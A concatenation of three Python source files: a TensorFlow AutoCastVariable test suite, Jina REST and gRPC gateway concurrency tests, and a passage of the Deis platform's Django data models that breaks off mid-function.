indexed_slices from tensorflow.python.framework import ops from tensorflow.python.framework import test_combinations as combinations from tensorflow.python.keras.mixed_precision import autocast_variable from tensorflow.python.keras.optimizer_v2 import adadelta from tensorflow.python.keras.optimizer_v2 import adagrad from tensorflow.python.keras.optimizer_v2 import adam from tensorflow.python.keras.optimizer_v2 import adamax from tensorflow.python.keras.optimizer_v2 import ftrl from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_v2 from tensorflow.python.keras.optimizer_v2 import nadam from tensorflow.python.keras.optimizer_v2 import rmsprop from tensorflow.python.ops import array_ops from tensorflow.python.ops import state_ops from tensorflow.python.ops import variables from tensorflow.python.platform import test from tensorflow.python.training import gradient_descent as gradient_descent_v1 from tensorflow.python.training.tracking import util as trackable_utils maybe_distribute = combinations.combine(distribution=[ strategy_combinations.default_strategy, strategy_combinations.mirrored_strategy_with_cpu_1_and_2 ]) def get_var(val, dtype, name=None): return variables.VariableV1(val, use_resource=True, dtype=dtype, name=name) @ds_combinations.generate(combinations.combine(mode=['graph', 'eager'])) class AutoCastVariableTest(test.TestCase, parameterized.TestCase): def setUp(self): test_util.set_logical_devices_to_at_least('CPU', 3) super(AutoCastVariableTest, self).setUp() @ds_combinations.generate(maybe_distribute) def test_read(self, distribution): with distribution.scope(): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) # outside of auto cast scope. self.assertEqual(x.dtype, dtypes.float32) self.assertEqual(x.value().dtype, dtypes.float32) self.assertEqual(x.read_value().dtype, dtypes.float32) self.assertEqual(array_ops.identity(x).dtype, dtypes.float32) # within auto cast scope of different dtype with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertEqual(x.dtype, dtypes.float32) self.assertEqual(x.value().dtype, dtypes.float16) self.assertEqual(x.read_value().dtype, dtypes.float16) self.assertEqual(array_ops.identity(x).dtype, dtypes.float16) # within auto cast scope of same dtype with autocast_variable.enable_auto_cast_variables(dtypes.float32): self.assertEqual(x.dtype, dtypes.float32) self.assertEqual(x.value().dtype, dtypes.float32) self.assertEqual(x.read_value().dtype, dtypes.float32) self.assertEqual(array_ops.identity(x).dtype, dtypes.float32) def test_sparse_reads(self): x = get_var([1., 2], dtypes.float32) # DistributedVariables do not support sparse_read or gather_nd, so we pass # distribute=False x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) self.assertEqual(x.sparse_read([0]).dtype, dtypes.float32) self.assertEqual(x.gather_nd([0]).dtype, dtypes.float32) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertEqual(x.sparse_read([0]).dtype, dtypes.float16) self.assertEqual(x.gather_nd([0]).dtype, dtypes.float16) @ds_combinations.generate(maybe_distribute) def test_read_nested_scopes(self, distribution): with distribution.scope(): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertEqual(x.read_value().dtype, dtypes.float16) with autocast_variable.enable_auto_cast_variables(dtypes.float32): self.assertEqual(x.read_value().dtype, dtypes.float32) self.assertEqual(x.read_value().dtype, dtypes.float16) @ds_combinations.generate(maybe_distribute) def test_dtype_is_not_string(self, distribution): with distribution.scope(): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.assertEqual(x.dtype, dtypes.float32) self.assertIsInstance(x.dtype, dtypes.DType) self.assertEqual(x.true_dtype, dtypes.float32) self.assertIsInstance(x.true_dtype, dtypes.DType) dtype = dtypes.float16 with autocast_variable.enable_auto_cast_variables(dtype): self.assertEqual(x.dtype, dtypes.float32) self.assertIsInstance(x.dtype, dtypes.DType) self.assertEqual(x.true_dtype, dtypes.float32) self.assertIsInstance(x.true_dtype, dtypes.DType) @ds_combinations.generate(maybe_distribute) def test_method_delegations(self, distribution): # Test AutoCastVariable correctly delegates Variable methods to the # underlying variable. with self.test_session(), distribution.scope(): for read_dtype in (dtypes.float32, dtypes.float16): if ds_context.has_strategy(): # MirroredVariable.assign will (incorrectly) return a Mirrored value # instead of a MirroredVariable. So we cannot properly wrap it in an # AutoCastVariable. evaluate = self.evaluate else: def evaluate(var): self.assertIsInstance(var, autocast_variable.AutoCastVariable) self.assertEqual(array_ops.identity(var).dtype, read_dtype) # pylint: disable=cell-var-from-loop return self.evaluate(var) x = get_var(7., dtypes.float32) x = autocast_variable.create_autocast_variable(x) with autocast_variable.enable_auto_cast_variables(read_dtype): self.evaluate(x.initializer) self.assertEqual(self.evaluate(x.value()), 7) self.assertEqual(self.evaluate(x.read_value()), 7) self.assertTrue(x.trainable) self.assertEqual(x.synchronization, x._variable.synchronization) self.assertEqual(x.aggregation, x._variable.aggregation) self.assertEqual(self.evaluate(x.initialized_value()), 7) if not context.executing_eagerly(): if not ds_context.has_strategy(): # These functions are not supported for DistributedVariables x.load(9) self.assertEqual(x.eval(), 9) self.assertEqual(self.evaluate(x.initial_value), 7) self.assertEqual(x.op, x._variable.op) self.assertEqual(x.graph, x._variable.graph) if not ds_context.has_strategy(): # These attributes are not supported for DistributedVariables self.assertIsNone(x.constraint) self.assertEqual(x.initializer, x._variable.initializer) self.assertEqual(evaluate(x.assign(8)), 8) self.assertEqual(evaluate(x.assign_add(2)), 10) self.assertEqual(evaluate(x.assign_sub(3)), 7) self.assertEqual(x.name, x._variable.name) self.assertEqual(x.device, x._variable.device) self.assertEqual(x.shape, ()) self.assertEqual(x.get_shape(), ()) if not ds_context.has_strategy(): # Test scatter_* methods. These are not supported for # DistributedVariables x = get_var([7, 8], dtypes.float32) x = autocast_variable.create_autocast_variable(x) with autocast_variable.enable_auto_cast_variables(read_dtype): self.evaluate(x.initializer) self.assertAllEqual(self.evaluate(x.value()), [7, 8]) def slices(val, index): return indexed_slices.IndexedSlices( values=constant_op.constant(val, dtype=dtypes.float32), indices=constant_op.constant(index, dtype=dtypes.int32), dense_shape=constant_op.constant([2], dtype=dtypes.int32)) self.assertAllEqual(evaluate(x.scatter_sub(slices(1., 0))), [6, 8]) self.assertAllEqual(evaluate(x.scatter_add(slices(1., 0))), [7, 8]) self.assertAllEqual(evaluate(x.scatter_max(slices(9., 1))), [7, 9]) self.assertAllEqual(evaluate(x.scatter_min(slices(8., 1))), [7, 8]) self.assertAllEqual(evaluate(x.scatter_mul(slices(2., 1))), [7, 16]) self.assertAllEqual(evaluate(x.scatter_div(slices(2., 1))), [7, 8]) self.assertAllEqual( evaluate(x.scatter_update(slices(4., 1))), [7, 4]) self.assertAllEqual( evaluate(x.scatter_nd_sub([[0], [1]], [1., 2.])), [6, 2]) self.assertAllEqual( evaluate(x.scatter_nd_add([[0], [1]], [1., 2.])), [7, 4]) self.assertAllEqual( evaluate(x.scatter_nd_update([[0], [1]], [1., 2.])), [1, 2]) @ds_combinations.generate(maybe_distribute) def test_operator_overloads(self, distribution): with distribution.scope(): for read_dtype in (dtypes.float32, dtypes.float16): x = get_var(7., dtypes.float32) x = autocast_variable.create_autocast_variable(x) with autocast_variable.enable_auto_cast_variables(read_dtype): self.evaluate(x.initializer) self.assertAlmostEqual(8, self.evaluate(x + 1)) self.assertAlmostEqual(10, self.evaluate(3 + x)) self.assertAlmostEqual(14, self.evaluate(x + x)) self.assertAlmostEqual(5, self.evaluate(x - 2)) self.assertAlmostEqual(6, self.evaluate(13 - x)) self.assertAlmostEqual(0, self.evaluate(x - x)) self.assertAlmostEqual(14, self.evaluate(x * 2)) self.assertAlmostEqual(21, self.evaluate(3 * x)) self.assertAlmostEqual(49, self.evaluate(x * x)) self.assertAlmostEqual(3.5, self.evaluate(x / 2)) self.assertAlmostEqual(1.5, self.evaluate(10.5 / x)) self.assertAlmostEqual(3, self.evaluate(x // 2)) self.assertAlmostEqual(2, self.evaluate(15 // x)) if read_dtype == dtypes.float32: # The "mod" operator does not support float16 self.assertAlmostEqual(1, self.evaluate(x % 2)) self.assertAlmostEqual(2, self.evaluate(16 % x)) self.assertTrue(self.evaluate(x < 12)) self.assertTrue(self.evaluate(x <= 12)) self.assertFalse(self.evaluate(x > 12)) self.assertFalse(self.evaluate(x >= 12)) self.assertFalse(self.evaluate(12 < x)) self.assertFalse(self.evaluate(12 <= x)) self.assertTrue(self.evaluate(12 > x)) self.assertTrue(self.evaluate(12 >= x)) self.assertAlmostEqual(343, self.evaluate(pow(x, 3)), places=4) self.assertAlmostEqual(128, self.evaluate(pow(2, x)), places=4) self.assertAlmostEqual(-7, self.evaluate(-x)) self.assertAlmostEqual(7, self.evaluate(abs(x))) x = get_var([7, 8, 9], dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) self.assertEqual(self.evaluate(x[1]), 8) if tf2.enabled() and context.executing_eagerly(): self.assertAllEqual(x == [7., 8., 10.], [True, True, False]) self.assertAllEqual(x != [7., 8., 10.], [False, False, True]) @ds_combinations.generate(maybe_distribute) def test_assign(self, distribution): with distribution.scope(): x = get_var(0., dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) # outside of auto cast scope. v1 = constant_op.constant(3., dtype=dtypes.float32) v2 = constant_op.constant(3., dtype=dtypes.float16) def run_and_check(): # Assign float32 values self.assertAllClose(3., self.evaluate(x.assign(v1))) self.assertAllClose(3. * 2, self.evaluate(x.assign_add(v1))) self.assertAllClose(3., self.evaluate(x.assign_sub(v1))) # Attempt to assign float16 values with self.assertRaisesRegex( ValueError, 'conversion requested dtype float32 for Tensor with dtype float16'): self.evaluate(x.assign(v2)) with self.assertRaisesRegex( ValueError, 'conversion requested dtype float32 for Tensor with dtype float16'): self.evaluate(x.assign_add(v2)) with self.assertRaisesRegex( ValueError, 'conversion requested dtype float32 for Tensor with dtype float16'): self.evaluate(x.assign_sub(v2)) # Assign Python floats self.assertAllClose(0., self.evaluate(x.assign(0.))) self.assertAllClose(3., self.evaluate(x.assign(3.))) self.assertAllClose(3. * 2, self.evaluate(x.assign_add(3.))) self.assertAllClose(3., self.evaluate(x.assign_sub(3.))) # Assign multiple times # This currently doesn't work in graph mode if a strategy is used if not ds_context.has_strategy() or context.executing_eagerly(): assign = x.assign(1.) self.assertAllClose(1., self.evaluate(assign)) self.assertAllClose(0., self.evaluate(assign.assign(0.))) assign_add = x.assign_add(3.) self.assertAllClose(3., self.evaluate(assign_add)) self.assertAllClose(3. * 3, self.evaluate(x.assign_add(3.).assign_add(3.))) self.assertAllClose(3. * 3, x) assign_sub = x.assign_sub(3.) self.assertAllClose(3. * 2, self.evaluate(assign_sub)) self.assertAllClose(0., self.evaluate(x.assign_sub(3.).assign_sub(3.))) # Assign with read_value=False self.assertIsNone(self.evaluate(x.assign(1., read_value=False))) self.assertAllClose(1., self.evaluate(x)) self.assertIsNone(self.evaluate(x.assign_add(2., read_value=False))) self.assertAllClose(3., self.evaluate(x)) self.assertIsNone(self.evaluate(x.assign_sub(3., read_value=False))) self.assertAllClose(0., self.evaluate(x)) # Use the tf.assign functions instead of the var.assign methods. self.assertAllClose(0., self.evaluate(state_ops.assign(x, 0.))) self.assertAllClose(3., self.evaluate(state_ops.assign(x, 3.))) self.assertAllClose(3. * 2, self.evaluate(state_ops.assign_add(x, 3.))) self.assertAllClose(3., self.evaluate(state_ops.assign_sub(x, 3.))) run_and_check() # reset x self.evaluate(x.assign(0.)) # within auto cast scope. with autocast_variable.enable_auto_cast_variables(dtypes.float16): # assign still expect float32 value even if in float16 scope run_and_check() @ds_combinations.generate(maybe_distribute) def test_assign_tf_function(self, distribution): if not context.executing_eagerly(): self.skipTest('Test is not compatible with graph mode') with distribution.scope(): x = get_var(0., dtypes.float32) x = autocast_variable.create_autocast_variable(x) @def_function.function def run_assign(): return x.assign(1.).assign_add(3.).assign_add(3.).assign_sub(2.) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertAllClose(5., self.evaluate(run_assign())) @ds_combinations.generate(maybe_distribute) def test_op_attribute(self, distribution): with distribution.scope(): x = get_var(0., dtypes.float32) x = autocast_variable.create_autocast_variable(x) # Variable.op raises an AttributeError in Eager mode and is an op in graph # mode. Variable.assign(...).op is None in Eager mode and an op in Graph # mode or a tf.function. We test this is also true of AutoCastVariable. if context.executing_eagerly(): with self.assertRaisesRegex( AttributeError, 'Tensor.op is meaningless when eager execution is enabled'): x.op # pylint: disable=pointless-statement self.assertIsNone(x.assign(1.0).op) self.assertIsNone(x.assign_add(1.0).op) self.assertIsNone(x.assign_sub(1.0).op) else: self.assertIsNotNone(x.op) self.assertIsNotNone(x.assign(1.0).op) self.assertIsNotNone(x.assign_add(1.0).op) self.assertIsNotNone(x.assign_sub(1.0).op) @def_function.function def func(): self.assertIsNotNone(x.assign(1.0).op) self.assertIsNotNone(x.assign_add(1.0).op) self.assertIsNotNone(x.assign_sub(1.0).op) func() @ds_combinations.generate(maybe_distribute) def test_tf_function_control_dependencies(self, distribution): if not context.executing_eagerly(): self.skipTest('Test is not compatible with graph mode') with distribution.scope(): x = get_var(0., dtypes.float32) x = autocast_variable.create_autocast_variable(x) @def_function.function def func(): update = x.assign_add(1.) with ops.control_dependencies([update]): x.assign_add(1.) func() self.assertAllClose(2., self.evaluate(x)) @ds_combinations.generate(maybe_distribute) def test_assign_stays_in_true_dtype(self, distribution): with distribution.scope(): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) # small_val is a value such that 1.0 + small_val == 1.0 in fp16, but not # in fp32 small_val = np.finfo('float16').eps / 2 small_tensor = constant_op.constant(small_val, dtype=dtypes.float32) with autocast_variable.enable_auto_cast_variables(dtypes.float16): # Variable should be increased, despite it appearing to be the same # float16 value. self.evaluate(x.assign(1. + small_tensor)) self.assertEqual(1., self.evaluate(x.value())) self.assertEqual(1. + small_val, self.evaluate(x)) self.evaluate(x.assign(1.)) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.evaluate(x.assign_add(small_tensor)) self.assertEqual(1., self.evaluate(x.value())) self.assertEqual(1. + small_val, self.evaluate(x)) def test_thread_local_autocast_dtype(self): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertEqual(array_ops.identity(x).dtype, dtypes.float16) # New threads should not see the modified value of the autocast dtype. var_dtype = None def f(): nonlocal var_dtype var_dtype = x._cast_dtype thread = threading.Thread(target=f) thread.start() thread.join() self.assertEqual(var_dtype, dtypes.float32) @ds_combinations.generate(maybe_distribute) def test_checkpoint(self, distribution): with self.test_session(): with distribution.scope(): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) self.evaluate(x.initializer) self.evaluate(x.assign(123.)) checkpoint = trackable_utils.Checkpoint(x=x) prefix = os.path.join(self.get_temp_dir(), 'ckpt') save_path = checkpoint.save(prefix) self.evaluate(x.assign(234.)) checkpoint.restore(save_path).assert_consumed().run_restore_ops() self.assertEqual(self.evaluate(x), 123.) @ds_combinations.generate(maybe_distribute) def test_invalid_wrapped_variable(self, distribution): with distribution.scope(): # Wrap a non-variable with self.assertRaisesRegex(ValueError, 'variable must be of type'): x = constant_op.constant([1.], dtype=dtypes.float32) autocast_variable.create_autocast_variable(x) # Wrap a non-floating point variable with self.assertRaisesRegex(ValueError, 'variable must be a floating point'): x = get_var(1, dtypes.int32) autocast_variable.create_autocast_variable(x) def test_repr(self): # We do not test with DistributionStrategy because we do not want to rely on # the exact __repr__ output of a DistributedVariable. x = get_var(1., dtypes.float32, name='x') x = autocast_variable.create_autocast_variable(x) if context.executing_eagerly(): self.assertStartsWith( repr(x), "<AutoCastVariable 'x:0' shape=() dtype=float32 " "dtype_to_cast_to=float32, numpy=" ) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertStartsWith( repr(x), "<AutoCastVariable 'x:0' shape=() dtype=float32 " "dtype_to_cast_to=float16, numpy=" ) else: self.assertEqual( repr(x), "<AutoCastVariable 'x:0' shape=() dtype=float32 " "dtype_to_cast_to=float32>" ) with autocast_variable.enable_auto_cast_variables(dtypes.float16): self.assertEqual( repr(x), "<AutoCastVariable 'x:0' shape=() dtype=float32 " "dtype_to_cast_to=float16>" ) def test_repr_distributed(self): strategy = mirrored_strategy.MirroredStrategy(['/cpu:1', '/cpu:2']) with strategy.scope(): x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) use_policy = getattr(strategy.extended, '_use_var_policy', False) if use_policy: self.assertRegex( repr(x).replace('\n', ' '), '<AutoCastDistributedVariable dtype=float32 ' 'dtype_to_cast_to=float32 ' 'inner_variable=DistributedVariable.*>') else: self.assertRegex( repr(x).replace('\n', ' '), '<AutoCastDistributedVariable dtype=float32 ' 'dtype_to_cast_to=float32 ' 'inner_variable=MirroredVariable.*>') @ds_combinations.generate(combinations.combine( optimizer_class=[ adadelta.Adadelta, adagrad.Adagrad, adam.Adam, adamax.Adamax, ftrl.Ftrl, gradient_descent_v2.SGD, nadam.Nadam, rmsprop.RMSprop, gradient_descent_v1.GradientDescentOptimizer ], use_tf_function=[False, True])) def test_optimizer(self, optimizer_class, use_tf_function): if use_tf_function and not context.executing_eagerly(): self.skipTest('Test does not support graph mode with tf.function') x = get_var(1., dtypes.float32) x = autocast_variable.create_autocast_variable(x) y = get_var(1., dtypes.float32) opt = optimizer_class(learning_rate=1.) def f(): # Minimize both the AutoCastVariable and the normal tf.Variable. Both # variables should be updated to the same value. op = opt.minimize(lambda: x + y, var_list=[x, y]) return None if ops.executing_eagerly_outside_functions() else op if use_tf_function: f = def_function.function(f) if context.executing_eagerly(): f() else: op = f() self.evaluate(variables.global_variables_initializer()) self.evaluate(op) # Assert the AutoCastVariable has changed from its initial value self.assertNotEqual(self.evaluate(x), 1.) # Assert AutoCastVariable is updated correctly by comparing it to the normal # variable self.assertAlmostEqual(self.evaluate(x), self.evaluate(y)) if optimizer_class in (gradient_descent_v2.SGD, gradient_descent_v1.GradientDescentOptimizer): # With SGD, the variables decreases by exactly 1 self.assertEqual(self.evaluate(x), 0) if __name__ == '__main__': test.main()
test_gateway.py
import functools import time from threading import Thread import numpy as np import pytest import requests from jina.flow import Flow concurrency = 10 # @pytest.mark.skip('this tests hang up for unknown reason on github') def test_rest_gateway_concurrency(): def _request(status_codes, durations, index): resp = requests.post( f'http://0.0.0.0:{f.port_expose}/api/index', json={ 'data': [ 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAIAAABLbSncAAAA2ElEQVR4nADIADf/AxWcWRUeCEeBO68T3u1qLWarHqMaxDnxhAEaLh0Ssu6ZGfnKcjP4CeDLoJok3o4aOPYAJocsjktZfo4Z7Q/WR1UTgppAAdguAhR+AUm9AnqRH2jgdBZ0R+kKxAFoAME32BL7fwQbcLzhw+dXMmY9BS9K8EarXyWLH8VYK1MACkxlLTY4Eh69XfjpROqjE7P0AeBx6DGmA8/lRRlTCmPkL196pC0aWBkVs2wyjqb/LABVYL8Xgeomjl3VtEMxAeaUrGvnIawVh/oBAAD///GwU6v3yCoVAAAAAElFTkSuQmCC', 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAIAAABLbSncAAAA2ElEQVR4nADIADf/AvdGjTZeOlQq07xSYPgJjlWRwfWEBx2+CgAVrPrP+O5ghhOa+a0cocoWnaMJFAsBuCQCgiJOKDBcIQTiLieOrPD/cp/6iZ/Iu4HqAh5dGzggIQVJI3WqTxwVTDjs5XJOy38AlgHoaKgY+xJEXeFTyR7FOfF7JNWjs3b8evQE6B2dTDvQZx3n3Rz6rgOtVlaZRLvR9geCAxuY3G+0mepEAhrTISES3bwPWYYi48OUrQOc//IaJeij9xZGGmDIG9kc73fNI7eA8VMBAAD//0SxXMMT90UdAAAAAElFTkSuQmCC']}) durations[index] = resp.elapsed.total_seconds() status_codes[index] = resp.status_code f = Flow(rest_api=True).add( uses='_pass', parallel=2) with f: concurrency = 50 threads = [] status_codes = [None] * concurrency durations = [None] * concurrency for i in range(concurrency): t = Thread(target=_request, args=(status_codes, durations, i)) t.daemon = True t.start() threads.append(t) for t in threads: t.join() success = status_codes.count(200) failed = len(status_codes) - success print( f'\nmin roundtrip time: {np.min(durations)}\n', f'max roundtrip time: {np.max(durations)}\n' f'mean roundtrip time: {np.mean(durations)}\n' ) assert success >= 1 # In some slow environments, a certain degree of failed # requests will occur. Here we limit the degree of failed # requests. rate = failed / success assert rate < 0.1 @pytest.mark.skip('raw grpc gateway is not stable enough under high concurrency') def test_grpc_gateway_concurrency(): def _input_fn(): return iter([ 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAIAAABLbSncAAAA2ElEQVR4nADIADf/AxWcWRUeCEeBO68T3u1qLWarHqMaxDnxhAEaLh0Ssu6ZGfnKcjP4CeDLoJok3o4aOPYAJocsjktZfo4Z7Q/WR1UTgppAAdguAhR+AUm9AnqRH2jgdBZ0R+kKxAFoAME32BL7fwQbcLzhw+dXMmY9BS9K8EarXyWLH8VYK1MACkxlLTY4Eh69XfjpROqjE7P0AeBx6DGmA8/lRRlTCmPkL196pC0aWBkVs2wyjqb/LABVYL8Xgeomjl3VtEMxAeaUrGvnIawVh/oBAAD///GwU6v3yCoVAAAAAElFTkSuQmCC', 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAICAIAAABLbSncAAAA2ElEQVR4nADIADf/AvdGjTZeOlQq07xSYPgJjlWRwfWEBx2+CgAVrPrP+O5ghhOa+a0cocoWnaMJFAsBuCQCgiJOKDBcIQTiLieOrPD/cp/6iZ/Iu4HqAh5dGzggIQVJI3WqTxwVTDjs5XJOy38AlgHoaKgY+xJEXeFTyR7FOfF7JNWjs3b8evQE6B2dTDvQZx3n3Rz6rgOtVlaZRLvR9geCAxuY3G+0mepEAhrTISES3bwPWYYi48OUrQOc//IaJeij9xZGGmDIG9kc73fNI7eA8VMBAAD//0SxXMMT90UdAAAAAElFTkSuQmCC']) def _validate(req, start, status_codes, durations, index): end = time.time() durations[index] = (end - start) status_codes[index] = req.status.code def _request(f, status_codes, durations, index): start = time.time() f.index( input_fn=_input_fn, output_fn=functools.partial( _validate, start=start, status_codes=status_codes, durations=durations, index=index )) f = Flow().add( uses='_pass', parallel=2) with f: threads = [] status_codes = [None] * concurrency durations = [None] * concurrency for i in range(concurrency): t = Thread( target=_request, args=( f, status_codes, durations, i)) threads.append(t) t.start() for t in threads: t.join() print(f'terminate {t}') success = status_codes.count(0) failed = len(status_codes) - success print( f'\nmin roundtrip time: {np.min(durations)}\n', f'max roundtrip time: {np.max(durations)}\n' f'mean roundtrip time: {np.mean(durations)}\n' ) assert success >= 1 # In some slow environments, a certain degree of failed # requests will occur. Here we limit the degree of failed # requests. rate = failed / success assert rate < 0.1
models.py
# -*- coding: utf-8 -*- """ Data models for the Deis API. """ from __future__ import unicode_literals import base64 from datetime import datetime import etcd import importlib import logging import os import re import subprocess import time from threading import Thread from django.conf import settings from django.contrib.auth import get_user_model from django.core.exceptions import ValidationError, SuspiciousOperation from django.db import models from django.db.models import Count from django.db.models import Max from django.db.models.signals import post_delete, post_save from django.dispatch import receiver from django.utils.encoding import python_2_unicode_compatible from docker.utils import utils as dockerutils from json_field.fields import JSONField from OpenSSL import crypto import requests from rest_framework.authtoken.models import Token from api import fields, utils, exceptions from registry import publish_release from utils import dict_diff, fingerprint logger = logging.getLogger(__name__) def close_db_connections(func, *args, **kwargs): """ Decorator to explicitly close db connections during threaded execution Note this is necessary to work around: https://code.djangoproject.com/ticket/22420 """ def _close_db_connections(*args, **kwargs): ret = None try: ret = func(*args, **kwargs) finally: from django.db import connections for conn in connections.all(): conn.close() return ret return _close_db_connections def log_event(app, msg, level=logging.INFO): # controller needs to know which app this log comes from logger.log(level, "{}: {}".format(app.id, msg)) app.log(msg) def validate_base64(value): """Check that value contains only valid base64 characters.""" try: base64.b64decode(value.split()[1]) except Exception as e: raise ValidationError(e) def validate_id_is_docker_compatible(value): """ Check that the ID follows docker's image name constraints """ match = re.match(r'^[a-z0-9-]+$', value) if not match: raise ValidationError("App IDs can only contain [a-z0-9-].") def validate_app_structure(value): """Error if the dict values aren't ints >= 0.""" try: if any(int(v) < 0 for v in value.viewvalues()): raise ValueError("Must be greater than or equal to zero") except ValueError, err: raise ValidationError(err) def validate_reserved_names(value): """A value cannot use some reserved names.""" if value in settings.DEIS_RESERVED_NAMES: raise ValidationError('{} is a reserved name.'.format(value)) def validate_comma_separated(value): """Error if the value doesn't look like a list of hostnames or IP addresses separated by commas. """ if not re.search(r'^[a-zA-Z0-9-,\.]+$', value): raise ValidationError( "{} should be a comma-separated list".format(value)) def validate_domain(value): """Error if the domain contains unexpected characters.""" if not re.search(r'^[a-zA-Z0-9-\.]+$', value): raise ValidationError('"{}" contains unexpected characters'.format(value)) def validate_certificate(value): try: crypto.load_certificate(crypto.FILETYPE_PEM, value) except crypto.Error as e: raise ValidationError('Could not load certificate: {}'.format(e)) def get_etcd_client(): if not hasattr(get_etcd_client, "client"): # wire up etcd publishing if we can connect try: get_etcd_client.client = etcd.Client( host=settings.ETCD_HOST, port=int(settings.ETCD_PORT)) get_etcd_client.client.get('/deis') except etcd.EtcdException: logger.log(logging.WARNING, 'Cannot synchronize with etcd cluster') get_etcd_client.client = None return get_etcd_client.client class AuditedModel(models.Model): """Add created and updated fields to a model.""" created = models.DateTimeField(auto_now_add=True) updated = models.DateTimeField(auto_now=True) class Meta: """Mark :class:`AuditedModel` as abstract.""" abstract = True def select_app_name(): """Select a unique randomly generated app name""" name = utils.generate_app_name() while App.objects.filter(id=name).exists(): name = utils.generate_app_name() return name class UuidAuditedModel(AuditedModel): """Add a UUID primary key to an :class:`AuditedModel`.""" uuid = fields.UuidField('UUID', primary_key=True) class Meta: """Mark :class:`UuidAuditedModel` as abstract.""" abstract = True @python_2_unicode_compatible class App(UuidAuditedModel): """ Application used to service requests on behalf of end-users """ owner = models.ForeignKey(settings.AUTH_USER_MODEL) id = models.SlugField(max_length=64, unique=True, default=select_app_name, validators=[validate_id_is_docker_compatible, validate_reserved_names]) structure = JSONField(default={}, blank=True, validators=[validate_app_structure]) class Meta: permissions = (('use_app', 'Can use app'),) @property def _scheduler(self): mod = importlib.import_module(settings.SCHEDULER_MODULE) return mod.SchedulerClient(settings.SCHEDULER_TARGET, settings.SCHEDULER_AUTH, settings.SCHEDULER_OPTIONS, settings.SSH_PRIVATE_KEY) def __str__(self): return self.id @property def url(self): return self.id + '.' + settings.DEIS_DOMAIN def _get_job_id(self, container_type): app = self.id release = self.release_set.latest() version = "v{}".format(release.version) job_id = "{app}_{version}.{container_type}".format(**locals()) return job_id def _get_command(self, container_type): try: # if this is not procfile-based app, ensure they cannot break out # and run arbitrary commands on the host # FIXME: remove slugrunner's hardcoded entrypoint release = self.release_set.latest() if release.build.dockerfile or not release.build.sha: return "bash -c '{}'".format(release.build.procfile[container_type]) else: return 'start {}'.format(container_type) # if the key is not present or if a parent attribute is None except (KeyError, TypeError, AttributeError): # handle special case for Dockerfile deployments return '' if container_type == 'cmd' else 'start {}'.format(container_type) def log(self, message): """Logs a message to the application's log file. This is a workaround for how Django interacts with Python's logging module. Each app needs its own FileHandler instance so it can write to its own log file. That won't work in Django's case because logging is set up before you run the server and it disables all existing logging configurations. """ with open(os.path.join(settings.DEIS_LOG_DIR, self.id + '.log'), 'a') as f: msg = "{} deis[api]: {}\n".format(time.strftime(settings.DEIS_DATETIME_FORMAT), message) f.write(msg.encode('utf-8')) def create(self, *args, **kwargs): """Create a new application with an initial config and release""" config = Config.objects.create(owner=self.owner, app=self) Release.objects.create(version=1, owner=self.owner, app=self, config=config, build=None) def delete(self, *args, **kwargs): """Delete this application including all containers""" try: # attempt to remove containers from the scheduler self._destroy_containers([c for c in self.container_set.exclude(type='run')]) except RuntimeError: pass self._clean_app_logs() return super(App, self).delete(*args, **kwargs) def restart(self, **kwargs): to_restart = self.container_set.all() if kwargs.get('type'): to_restart = to_restart.filter(type=kwargs.get('type')) if kwargs.get('num'): to_restart = to_restart.filter(num=kwargs.get('num')) self._restart_containers(to_restart) return to_restart def _clean_app_logs(self): """Delete application logs stored by the logger component""" path = os.path.join(settings.DEIS_LOG_DIR, self.id + '.log') if os.path.exists(path): os.remove(path) def scale(self, user, structure): # noqa """Scale containers up or down to match requested structure.""" if self.release_set.latest().build is None: raise EnvironmentError('No build associated with this release') requested_structure = structure.copy() release = self.release_set.latest() # test for available process types available_process_types = release.build.procfile or {} for container_type in requested_structure: if container_type == 'cmd': continue # allow docker cmd types in case we don't have the image source if container_type not in available_process_types: raise EnvironmentError( 'Container type {} does not exist in application'.format(container_type)) msg = '{} scaled containers '.format(user.username) + ' '.join( "{}={}".format(k, v) for k, v in requested_structure.items()) log_event(self, msg) # iterate and scale by container type (web, worker, etc) changed = False to_add, to_remove = [], [] scale_types = {} # iterate on a copy of the container_type keys for container_type in requested_structure.keys(): containers = list(self.container_set.filter(type=container_type).order_by('created')) # increment new container nums off the most recent container results = self.container_set.filter(type=container_type).aggregate(Max('num')) container_num = (results.get('num__max') or 0) + 1 requested = requested_structure.pop(container_type) diff = requested - len(containers) if diff == 0: continue changed = True scale_types[container_type] = requested while diff < 0: c = containers.pop() to_remove.append(c) diff += 1 while diff > 0: # create a database record c = Container.objects.create(owner=self.owner, app=self, release=release, type=container_type, num=container_num) to_add.append(c) container_num += 1 diff -= 1 if changed: if "scale" in dir(self._scheduler): self._scale_containers(scale_types, to_remove) else: if to_add: self._start_containers(to_add) if to_remove: self._destroy_containers(to_remove) # save new structure to the database vals = self.container_set.exclude(type='run').values( 'type').annotate(Count('pk')).order_by() new_structure = structure.copy() new_structure.update({v['type']: v['pk__count'] for v in vals}) self.structure = new_structure self.save() return changed def _scale_containers(self, scale_types, to_remove): release = self.release_set.latest() for scale_type in scale_types: image = release.image version = 